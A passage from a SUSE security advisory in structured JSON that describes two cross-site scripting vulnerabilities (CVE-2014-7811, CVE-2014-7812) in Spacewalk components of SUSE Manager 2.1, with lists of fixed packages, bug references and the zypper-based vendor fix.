"text": "Multiple cross-site scripting (XSS) vulnerabilities in Spacewalk and Red Hat Network (RHN) Satellite before 5.7.0 allow remote authenticated users to inject arbitrary web script or HTML via crafted XML data to the REST API.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-7811",
"url": "https://www.suse.com/security/cve/CVE-2014-7811"
},
{
"category": "external",
"summary": "SUSE Bug 902915 for CVE-2014-7811",
"url": "https://bugzilla.suse.com/902915"
},
{
"category": "external",
"summary": "SUSE Bug 912886 for CVE-2014-7811",
"url": "https://bugzilla.suse.com/912886"
},
{
"category": "external",
"summary": "SUSE Bug 922740 for CVE-2014-7811",
"url": "https://bugzilla.suse.com/922740"
},
{
"category": "external",
"summary": "SUSE Bug 969911 for CVE-2014-7811",
"url": "https://bugzilla.suse.com/969911"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2015-02-25T20:05:05Z",
"details": "moderate"
}
],
"title": "CVE-2014-7811"
},
{
"cve": "CVE-2014-7812",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-7812"
}
],
"notes": [
{
"category": "general",
"text": "Cross-site scripting (XSS) vulnerability in Spacewalk and Red Hat Network (RHN) Satellite before 5.7.0 allows remote authenticated users to inject arbitrary web script or HTML via the System Groups field.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-7812",
"url": "https://www.suse.com/security/cve/CVE-2014-7812"
},
{
"category": "external",
"summary": "SUSE Bug 912886 for CVE-2014-7812",
"url": "https://bugzilla.suse.com/912886"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
